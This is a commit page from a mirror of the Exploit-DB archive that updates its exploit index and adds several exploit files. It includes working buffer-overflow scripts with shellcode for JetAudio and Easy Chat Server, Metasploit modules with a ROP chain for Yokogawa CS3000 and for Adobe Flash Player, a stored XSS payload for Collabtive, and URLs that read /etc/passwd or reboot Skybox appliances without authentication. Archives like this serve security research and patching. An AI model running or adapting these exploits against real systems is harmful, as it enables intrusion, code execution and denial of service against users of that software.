bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_14_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-14 04:36:12 +00:00
parent b809e3cca6
commit 3a841992e3
13 changed files with 2252 additions and 54 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -8845,7 +8845,7 @@ id,file,description,date,author,platform,type,port
9371,platforms/php/webapps/9371.txt,"opennews 1.0 (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip d3 bi0s",php,webapps,0
9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0
9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 (.m3u) - Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0
9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 (.m3u /m3l) Universal Local BOF Exploit (SEH)",2009-08-06,hack4love,windows,local,0
9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
@ -9873,7 +9873,7 @@ id,file,description,date,author,platform,type,port
10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0
10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0
10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0
10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 (.asx) - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,indoushka,php,webapps,0
10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
@ -10278,7 +10278,7 @@ id,file,description,date,author,platform,type,port
11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0
11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u File) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0
11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,"cr4wl3r ",windows,local,0
11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0
11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic (.asx) - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0
11210,platforms/windows/remote/11210.rb,"EFS Easy Chat server Universal BOF-SEH (Meta)",2010-01-21,fb1h2s,windows,remote,0
11211,platforms/multiple/webapps/11211.txt,"cPanel HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0
11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0
@ -29250,7 +29250,7 @@ id,file,description,date,author,platform,type,port
32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0
32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 (.wav) - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0
32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0
32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0
@ -29976,6 +29976,8 @@ id,file,description,date,author,platform,type,port
33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0
33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0
33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0
33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Stored XSS",2014-05-08,"Deepak Rathore",php,webapps,0
33251,platforms/multiple/local/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,local,0
33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0
33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0
33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0
@ -30038,3 +30040,12 @@ id,file,description,date,author,platform,type,port
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x 'pipe.c' Local Privilege Escalation Vulnerability (1)",2009-11-03,"teach & xipe",linux,local,0
33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0
33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0
33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0
33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0
33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS Vulnerabilities",2014-05-12,"Dolev Farhi",windows,webapps,80
33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,metasploit,windows,remote,34205
33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0

Can't render this file because it is too large.

33
platforms/cgi/webapps/33334.txt Executable file
View file

@ -0,0 +1,33 @@
Product: VM Turbo Operations Manager
Vendor: VM Turbo
Vulnerable Version(s): 4.5.x earlier
Tested Version: 4.0
Advisory Publication: April 11, 2014
Vendor Notification: April 11, 2014
Public Disclosure: May 8, 2014
Vulnerability Type: Directory Traversal
Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file.
The following exploitation example displays the contents of /etc/passwd
http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd
------------------------------------------------------------------------
-----------------------
Solution:
The vendor has released a fix for this vulnerability in version 4.6.
References:
[1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement

42
platforms/hardware/dos/33328.txt Executable file
View file

@ -0,0 +1,42 @@
# Exploit Title: [SKYBOX Security - DDOS]
# Date: [22-Jan-2014]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.skyboxsecurity.com]
# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
# Tested on: [Centos 6.4 kernel 2.6.32]
# CVE : [CVE-2014-2085]
#OVERVIEW
A vulnerability has been found in some Skybox View Appliances Admin
interfaces which would allow a potential malicious party to bypass
the authentication mechanism and execute reboot and/or shutdown of
appliance self
#INTRODUCTION
Skybox Security has a complete portfolio of security management
tools that deliver the security intelligence needed to act fast to
minimize risks and eliminate attack vectors. Based on a powerful
risk analytics platform that links data from vulnerability scanners,
threat intelligence feeds, firewalls and other network infrastructure
devices Skybox gives you context to prioritize risks accurately and
automatically, in minutes.
#VULNERABILITY DESCRIPTION
It's possible to open and execute the reboot and shutdown script
without autentication at the following links:
https://1.1.1.1:444/scripts/commands/reboot?_=1111111111
https://1.1.1.1:444/scripts/commands/shutdown?_=1111111111
#VERSIONS AFFECTED
Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
#SOLUTION
Please refer to the vendor security advisor: Security Advisory 2014-
3-25-1
#CREDITS
Luigi Vezzoso
email: luigivezzoso@gmail.com
skype: luigivezzoso

48
platforms/hardware/webapps/33327.txt Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: [SKYBOX Security Multiple
Information Disclosure]
# Date: [22-Jan-2014]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.skyboxsecurity.com]
# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
# Tested on: [Centos 6.4 kernel 2.6.32]
# CVE : [CVE-2014-2084]
#OVERVIEW
A vulnerability has been found in some Skybox View Appliances Admin
interfaces which would allow a potential malicious party to bypass
the authentication mechanism and obtain read-only access to the
appliances administrative menus. This would allow the malicious
party to read system-related information such as interface names, IP
addresses and the appliance status.
#INTRODUCTION
Skybox Security has a complete portfolio of security management
tools that deliver the security intelligence needed to act fast to
minimize risks and eliminate attack vectors. Based on a powerful
risk analytics platform that links data from vulnerability scanners,
threat intelligence feeds, firewalls and other network infrastructure
devices Skybox gives you context to prioritize risks accurately and
automatically, in minutes.
#VULNERABILITY DESCRIPTION
It's possible to obtain useful information about the version and
network configuration of skybox appliances bypassing the webui
interface.
For the appliance system info open with a browser:
https://1.1.1.1:444/scripts/commands/getSystemInformation?_=111111111
For the appliance network info open with a browser:
https://1.1.1.1:444/scripts/commands/getNetworkConfigurationInfo
#VERSIONS AFFECTED
Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
#SOLUTION
Please refer to the vendor security advisor: Security Advisory 2014-
3-25-1
#CREDITS
Luigi Vezzoso
email: luigivezzoso@gmail.com
skype: luigivezzoso

1202
platforms/multiple/local/33251.txt Executable file
View file

File diff suppressed because it is too large Load diff

51
platforms/php/webapps/33250.txt Executable file
View file

@ -0,0 +1,51 @@
Vulnerability title: Stored XSS vulnerability in Collabtive application
(CVE-2014-3247)
CVE: CVE-2014-3247(coordinated with cve assigning team and vendor)
Vendor: Collabtive
Product: Collabtive (Open Source Project Management Software)
Affected version: 1.12
Fixed version: 2.0
Reported by: Deepak Rathore
Severity: Critical
URL: http://[domain]/collabtive-12/admin.php?action=addpro
Affected Users: Authenticated users
Affected parameter(s): desc
Issue details: The value of the desc request parameter is copied into the
HTML document as plain text between tags. The payload 1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6 was submitted in the desc parameter.
This input was echoed as 1c91c<img src=a onerror=alert(1) >cc245622da6 in
the application's response. This proof-of-concept attack demonstrates that
it is possible to inject arbitrary JavaScript into the application's
response. The proof-of-concept attack demonstrated uses an event handler to
introduce arbitrary JavaScript into the document.
HTTP request:
POST /collabtive-12/admin.php?action=addpro HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/collabtive-12/index.php?mode=login
Cookie: PHPSESSID=ri2sqmga763p7qav73enfv99p5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
name=test&desc=test928a4<img%20src%3da%20onerror%3dalert(1)>a480a723950&neverdue=neverdue&budget=10&assignto%5B%5D=1&assignme=1
Steps to replicate:
1. Login into application
2. Go to "Desktop" tab and click on "Add project"
3. Fill the project details in the project form and click on "Add" button
4. Intercept request by interception proxy i.e. OWASP Zap, Burp Suite etc
5. Replace "desc" parameter value with "1c91c<img%20src%3da
%20onerror%3dalert(1) >cc245622da6"
6. Forward manipulated request to server and wait for response in browser
7. A popup with alert message will come that is the proof of vulnerability.
Tools used: Burp Suite proxy, Mozilla Firefox browser
Best Regards,
Deepak

187
platforms/windows/dos/33332.py Executable file
View file

File diff suppressed because one or more lines are too long

177
platforms/windows/dos/33335.py Executable file
View file

File diff suppressed because one or more lines are too long

100
platforms/windows/local/9375.py
View file

@ -1,50 +1,50 @@
#!/usr/bin/env python
###########################################################################################
#
# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)
# Coded By: Dr_IDE
# Found By: HACK4LOVE
# Tested on Windows XP SP2
#
############################################################################################
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
jump = ("\xEB\x06\x90\x90");
retn = ("\x45\x10\x22\x01");
nops = ("\x90" * 16);
buff = ("http://" + "\x41" * 1017);
junk = ("\x45" * (876 - len(sc)));
f1 = open('Dr_IDE-JetAudio.M3U','w');
f1.write(buff + jump + retn + nops + sc + junk);
f1.close();
# milw0rm.com [2009-08-06]
#!/usr/bin/env python
###########################################################################################
#
# JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)
# Coded By: Dr_IDE
# Found By: HACK4LOVE
# Tested on Windows XP SP2
#
############################################################################################
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
jump = ("\xEB\x06\x90\x90");
retn = ("\x45\x10\x22\x01");
nops = ("\x90" * 16);
buff = ("http://" + "\x41" * 1017);
junk = ("\x45" * (876 - len(sc)));
f1 = open('Dr_IDE-JetAudio.M3U','w');
f1.write(buff + jump + retn + nops + sc + junk);
f1.close();
# milw0rm.com [2009-08-06]

55
platforms/windows/remote/33326.py Executable file
View file

@ -0,0 +1,55 @@
## Exploit-DB Note: Must install to 'C:\Program Files\EFS Software\Easy Chat Server'
# Exploit Title: Easy Chat Server 3.1 stack buffer overflow
# Date: 9 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 7 Enterprise SP1, English
#
# Description:
# A buffer overflow is triggered when when passing a long username.
import socket
import struct
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
# SEH overwritten at offset 207 when Easy Chat Server is
# installed in C:\Program Files\EFS Software\Easy Chat Server
payload = "A"*203
payload += "\xeb\x06\x90\x90" # short jmp to shellcode
payload += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
payload += "\x81\xc4\xd8\xfe\xff\xff" # add esp,-128
payload += shellcode # calc.exe
payload += "D"*193
buf = (
"GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host: 192.168.1.136:80\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://192.168.1.136\r\n"
"Connection: Keep-Alive\r\n\r\n"
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.123.131", 80))
s.send(buf)
print s.recv(1024)

160
platforms/windows/remote/33331.rb Executable file
View file

@ -0,0 +1,160 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
'Description' => %q{
This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
insecure usage of memcpy, using attacker controlled data as the size count. This module
has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
2003 SP2.
},
'Author' =>
[
'juan vazquez',
'Redsadic <julian.vilas[at]gmail.com>'
],
'References' =>
[
['CVE', '2014-0782'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
],
'Payload' =>
{
'Space' => 340,
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
{
'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll
'Offset' => 64,
'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe
}
],
],
'DisclosureDate' => 'Mar 10 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(34205)
], self.class)
end
def check
data = create_pkt(rand_text_alpha(4))
res = send_pkt(data)
if res && res.length == 10
simmgr_res = parse_response(res)
if valid_response?(simmgr_res)
check_code = Exploit::CheckCode::Appears
else
check_code = Exploit::CheckCode::Safe
end
else
check_code = Exploit::CheckCode::Safe
end
check_code
end
def exploit
bof = rand_text(target['Offset'])
bof << [target.ret].pack("V")
bof << [target['FakeArgument1']].pack("V")
bof << [target['FakeArgument2']].pack("V")
bof << rand_text(16) # padding (corrupted bytes)
bof << create_rop_chain
bof << payload.encoded
data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
data << [bof.length].pack("n")
data << bof
pkt = create_pkt(data)
print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
connect
sock.put(pkt)
disconnect
end
def create_rop_chain
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
0x619436d3, # POP EBP # RETN [libbkeeda.dll]
0x61615424, # & push esp # ret [libbkeldc.dll]
0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
0x00000001, # 0x00000001-> ebx
0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
0x00001000, # 0x00001000-> edx
0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
0x00000040, # 0x00000040-> ecx
0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
0x90909090, # nop
0x619532eb # PUSHAD # RETN [libbkeeda.dll]
].pack("V*")
rop_gadgets
end
def create_pkt(data)
pkt = [0x01].pack("N") # Operation Identifier
pkt << [data.length].pack("n") # length
pkt << data # Fake packet
pkt
end
def send_pkt(data)
connect
sock.put(data)
res = sock.get_once
disconnect
res
end
def parse_response(data)
data.unpack("NnN")
end
def valid_response?(data)
valid = false
if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5
valid = true
end
valid
end
end

129
platforms/windows/remote/33333.rb Executable file
View file

@ -0,0 +1,129 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Shader Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
vulnerability occurs in the flash.Display.Shader class, when setting specially
crafted data as its bytecode, as exploited in the wild in April 2014. This module
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2014-0515'],
['BID', '67092'],
['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],
['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]
],
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true,
'PrependEncoder' => stack_adjust
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Apr 28 2014",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def stack_adjust
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
adjust
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
